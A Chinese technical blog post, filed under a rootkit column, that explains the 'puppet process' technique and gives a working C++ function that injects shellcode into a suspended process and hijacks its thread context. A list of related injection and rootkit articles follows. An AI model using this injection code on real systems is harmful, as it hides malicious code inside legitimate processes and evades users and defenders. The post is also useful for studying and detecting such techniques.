[Rootkit] 傀儡进程

最新推荐文章于 2023-08-13 12:20:10 发布
最新推荐文章于 2023-08-13 12:20:10 发布
阅读量1.1k 收藏 3
点赞数 1
分类专栏: RootKit
原文链接:https://www.cnblogs.com/ndyxb/p/12905357.html
版权

实现原理:

以挂起的方式打开目标进程,将ShellCode代码写入目标进程,并修改目标进程的执行流程,使其转而执行ShellCode代码,这样,进程还是目标原本进程,但执行的操作却替换成我们的ShellCode了。

实现过程:

(1).调用CreateProcess以挂起的方式(CREATE_SUSPENDED)创建进程

(2).调用VirtualAllocEx函数申请一个可读、可写、可执行的内存

(3).调用WriteProcessMemory将Shellcode数据写入刚申请的内存中

(4).调用GetThreadContext,设置获取标志为CONTEXT_FULL,即获取新进程中所有线程的上下文

(5).修改线程上下文中EIP的值为申请的内存的首地址,通过SetThreadContext函数设置回主线程中

(6).调用ResumeThread恢复主线程

注意:在使用GetThreadContext获取线程上下文的时候,一定要对上下文结构中的ContextFlags成员赋值,指明要检索线程上下文的哪些部分,否则会导致程序不能实现到想要的效果。此次ContextFlags赋值为CONTEXT_FULL,这表示获取所有线程的上下文信息。

实现代码:

//************************************
    // 函数名:CHideDlg::ReplaceProcess
    // 返回类型:BOOL
    // 功能: 使用ShellCode替换目标进程
    // 参数1:char *pszFilePath        目标进程路径
    // 参数2:PVOID pReplaceData    Shellcode首地址
    // 参数3:DWORD dwReplaceDataSize    Shellcode大小(字节)
    // 参数4:DWORD dwRunOffset        Shellcode中开始代码相对首地址的偏移
    //************************************
BOOL CHideDlg::ReplaceProcess(char *pszFilePath, PVOID pReplaceData, DWORD dwReplaceDataSize, DWORD dwRunOffset)
{
    STARTUPINFOA si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    CONTEXT threadContext = { 0 };
    BOOL bRet = FALSE;
    ::RtlZeroMemory(&si, sizeof(si));
    ::RtlZeroMemory(&pi, sizeof(pi));
    ::RtlZeroMemory(&threadContext, sizeof(threadContext));
    si.cb = sizeof(si);
    // 创建进程并挂起主线程
    bRet = ::CreateProcessA(pszFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
    if (FALSE == bRet)
    {
        MessageBox(_T("创建挂起主线程失败!"));
        return FALSE;
    }
    // 在进程中申请一块内存
    LPVOID lpDestBaseAddr = ::VirtualAllocEx(pi.hProcess, NULL, dwReplaceDataSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (NULL == lpDestBaseAddr)
    {
        MessageBox(_T("申请内存失败!"));
        return FALSE;
    }
    // 写入Shellcode数据
    bRet = ::WriteProcessMemory(pi.hProcess, lpDestBaseAddr, pReplaceData, dwReplaceDataSize, NULL);
    if (FALSE == bRet)
    {
        MessageBox(_T("写入Shelcode失败!"));
        return FALSE;
    }
    // 获取线程上下文
    threadContext.ContextFlags = CONTEXT_FULL;
    bRet = ::GetThreadContext(pi.hThread, &threadContext);
    if (FALSE == bRet)
    {
        MessageBox(_T("获取线程上下文失败!"));
        return FALSE;
    }
    // 修改进程中PE文件的入口地址
    threadContext.Eip = (DWORD)lpDestBaseAddr + dwRunOffset;
    // 设置挂起进程的线程上下文
    bRet = ::SetThreadContext(pi.hThread, &threadContext);
    if (FALSE == bRet)
    {
        MessageBox(_T("设置挂起线程的上下文失败!"));
        return FALSE;
    }
    // 恢复挂起进程的线程
    ::ResumeThread(pi.hThread);
    return TRUE;
}
(-: LYSM :-)
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Windows傀儡进程实现C++代码
04-28
Windows平台傀儡进程实现,采用C++, vs2008实现,完美实现
进程注入,解决了VirtualAllocEx在傀儡进程申请基地址内存失败的问题。
字节跳动
04-02 3246
本文所贴出的PoC代码将告诉你如何通过CreateProcess创建一个傀儡进程(称之为可执行程序A),并把dwCreationFlags设置为CREATE_SUSPENDED,然后把另一个可执行程序(称之为可执行程序B)的内容加载到所创建的进程空间中,最终借用傀儡进程(A)的外壳来执行可执行程序B的内容。同时这段代码也会告诉你如何手工对Win32可执行程序进行重定位处理,以及如何从进程空间中取消...
傀儡进程内存Dump
XboxMicro
03-01 1343
傀儡进程(参见《动态加载并执行Win32可执行程序》),简单的说是指通过给CreateProcess传递一个CREATE_SUSPENDED参数可以使得被创建的子进程处于挂起状态,此时EXE的映像会被加载到进程空间中,但是并不会立即被执行,除非调用ResumeThread。在ResumeThread之前,通过GetThreadContext获取主线程的上下文以取得PEB等,调用ZwUnmapVie
windows黑客编程技术之隐藏技术(进程伪装,傀儡进程进程隐藏)
weixin_44891742的博客
07-26 5524
windows黑客编程技术之隐藏技术(进程伪装,傀儡进程进程隐藏)
傀儡进程学习
0xDQ的博客
10-05 3836
0x00 前言 最近做了一道18年swpuctf的题,分析了一个病毒,正巧都用到了傀儡进程,就想着把傀儡进程学习一下。本文权当个人的学习总结了一些网上的文章,如有错误,还请路过的大佬斧正。 0x01 SWPUCTF -- GAME 进入main函数 先获取当前目录,再拼上GAME.EXE 进入sub_4011D0 首先寻找资源,做准备工作,进入sub_4012C0 1)检测PE结构 2)CreateProcessA 创建进程 3)GetThreadContext...
EXE注入分析之傀儡进程
酷酷的鱼 - 网络编程,服务器安全专栏
01-15 3280
最近学习PE结构,顺便看到了一篇WIN32 EXE注入的文章,代码是04年的,比较古老了, 但是代码写的很好,受益匪浅,然后在百度很少找到翻译的比较清楚的文章,这篇我在代码中加了中文注释, 方便菜鸟理解,阅读这篇帖子需要熟悉PE结构,如果你不懂PE结构建议你先去学习下, 说错的地方请各位大神指正,板砖吐口水都可以。 --- 我是淫荡的分割线--- 提到傀儡进程,首先想到的
傀儡进程技术分析
darcy_123的博客
10-13 966
前言: 傀儡进程是将目标进程的映射文件替换为指定的映射文件,替换后的进程称之为傀儡进程;常常有恶意程序将隐藏在自己文件内的恶意代码加载进目标进程,而在加载进目标进程之前,会利用ZwUnmpViewOfSection或者NtUnmapViewOfSection进行相关设置 相关技术要点 1.创建挂起进程 系统函数CreateProcessW中参数dwCreation传递CREATE_SUSP...
windows xp隐藏进程 源代码.rootkit技术
01-24
windows xp隐藏进程 源代码.zip
rootkit进程隐藏
02-29
基于windows的隐藏进程的程序,vc6.0编译通过。
反隐藏进程技术检测技术 基本能查出当前所有Rootkit隐藏的进程 利用挂钩线程调度链表来实现.zip
01-28
反隐藏进程技术检测技术 基本能查出当前所有Rootkit隐藏的进程 利用挂钩线程调度链表来实现.zip
进程隐藏,
02-23
远程线程注入,例子中是注入到“CALC.EXE”你可改成任何其他的进程
ring0驱动开发Rootkit隐藏进程.zip
01-25
ring0驱动开发Rootkit隐藏进程.zip
ring0 rootkit驱动内核模式简单实现进程监控.zip
01-24
ring0 rootkit驱动内核模式简单实现进程监控.zip
创建傀儡进程svchost.exe并注入DLL文件(Shellcode)
【Rainbow Network Technology co., LTD】
08-13 482
本文主要利用 SetThreadContext 修改进程中的线程上下文来实现Dll注入(ShellCode)。
傀儡进程原理及调试
小黑话不多
08-11 3234
傀儡进程创建过程: (1) CreateProcess一个进程,并挂起,即向dwCreationFlags 参数传入CREATE_SUSPENDED; (2) GetThreadContext获取挂起进程CONTEXT,其中,EAX为进程入口点地址,EBX指向进程PEB; (3) ZwUnmapViewOfSection卸载挂起进程内存空间数据; (4) VirtualAllo
傀儡进程注入
qq_40710190的博客
05-08 889
傀儡进程注入 这个注入之所以叫傀儡进程注入是因为其做法是先创建一个A进程,然后将其内存替换成要执行的代码,而从外部来看就是最初创建的A进程。 从我的视角来看跟PE文件注入还蛮像的,不同点在于PE文件注入是将代码注入进去后修改EntryPoint引导至注入的代码,而傀儡进程注入则更加简单暴力一些😋,把所有内存替换了。 多亏了之前的一些PE基础因此没有特别费劲PE文件头格式解析 本章详细讲解m0n0ph1的源码 创建傀儡进程 根据一开始所说,我们需要创建一个进程 printf("Creating process
dll注入系列——傀儡进程
40KO的博客
04-11 957
0x0介绍 之前说过,要动态注入dll文件,则需要执行程序中本身没有的加载操作,必须改变控制流,除了创建线程外,还可以劫持控制流。这与二进制漏洞利用比较类似,我们向程序写入一段shellcode,然后改变线程上下文,让其去执行shellcode,这段shellcode完成LoadLibrary的操作,就完成了dll注入。 傀儡进程的本质是利用其他进程空间来执行我们的写入代码,它的实现并不困难...
进程隐藏技术
w_g3366的博客
08-28 7564
文章目录进程隐藏技术1.进程伪装2.傀儡进程3.进程隐藏4.DLL劫持 进程隐藏技术 进程伪装:通过修改指定进程PEB中的路径和命令行信息实现伪装。 傀儡进程:通过进程挂起,替换内存数据再恢复执行,从而实现创建傀儡进程 进程隐藏:通过HOOK函数ZwQuerySystemInfornation实现进程隐藏 DLL劫持:通过#pragma comment指令直接转发DLL导出函数或者通过LoadL...
在Coursera学习机器学习课程时,自己用python从原理上实现的各种机器学习基础内容.zip
最新发布
04-17
机器学习是一种人工智能(AI)的子领域,致力于研究如何利用数据和算法让计算机系统具备学习能力,从而能够自动地完成特定任务或者改进自身性能。机器学习的核心思想是让计算机系统通过学习数据中的模式和规律来实现目标,而不需要显式地编程。 机器学习应用非常广泛,包括但不限于以下领域: 图像识别和计算机视觉: 机器学习在图像识别、目标检测、人脸识别、图像分割等方面有着广泛的应用。例如,通过深度学习技术,可以训练神经网络来识别图像中的对象、人脸或者场景,用于智能监控、自动驾驶、医学影像分析等领域。 自然语言处理: 机器学习在自然语言处理领域有着重要的应用,包括文本分类、情感分析、机器翻译、语音识别等。例如,通过深度学习模型,可以训练神经网络来理解和生成自然语言,用于智能客服、智能助手、机器翻译等场景。 推荐系统: 推荐系统利用机器学习算法分析用户的行为和偏好,为用户推荐个性化的产品或服务。例如,电商网站可以利用机器学习算法分析用户的购买历史和浏览行为,向用户推荐感兴趣的商品。 预测和预测分析: 机器学习可以用于预测未来事件的发生概率或者趋势。例如,金融领域可以利用机器学习算法进行股票价格预测、信用评分、欺诈检测等。 医疗诊断和生物信息学: 机器学习在医疗诊断、药物研发、基因组学等领域有着重要的应用。例如,可以利用机器学习算法分析医学影像数据进行疾病诊断,或者利用机器学习算法分析基因数据进行疾病风险预测。 智能交通和物联网: 机器学习可以应用于智能交通系统、智能城市管理和物联网等领域。例如,可以利用机器学习算法分析交通数据优化交通流量,或者利用机器学习算法分析传感器数据监测设备状态。 以上仅是机器学习应用的一部分,随着机器学习技术的不断发展和应用场景的不断拓展,机器学习在各个领域都有着重要的应用价值,并且正在改变我们的生活和工作方式。
tur 进程anti rootkit
09-01
Tur进程(也称为Turbo用户程序)是一种用于反击Rootkit进程Rootkit是一种恶意软件,可以在操作系统中隐藏恶意活动,使用户难以察觉。为了应对这种威胁,Tur进程被设计为一种专门用于发现和清除Rootkit的工具。 Tur进程的工作原理是扫描和监视操作系统中的特定目录和文件,并尝试检测Rootkit的存在。它使用一系列技术和算法来分析系统文件和进程,以识别任何异常或隐藏的活动。一旦发现Rootkit,Tur进程会利用其内置的功能尝试将其删除或中止。 Tur进程的主要目标是保护系统的完整性和安全性。通过及时发现和清除Rootkit,它可以防止Rootkit对系统进行潜在的攻击和破坏。它还可以提供实时的监控和警报功能,以便及早发现系统遭受Rootkit攻击的迹象。 Tur进程通常由安全软件或操作系统的开发者提供和维护。用户可以选择安装这些软件,并将Tur进程作为常驻进程运行,以确保系统的安全。但需要注意的是,虽然Tur进程可以提高系统的安全性,但并不能完全消除Rootkit的威胁。因此,用户仍然需要采取其他安全措施,如定期更新系统和应用程序,谨慎下载和访问互联网上的文件。只有综合使用各种安全措施才能最大程度地保护系统免受恶意软件的侵害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值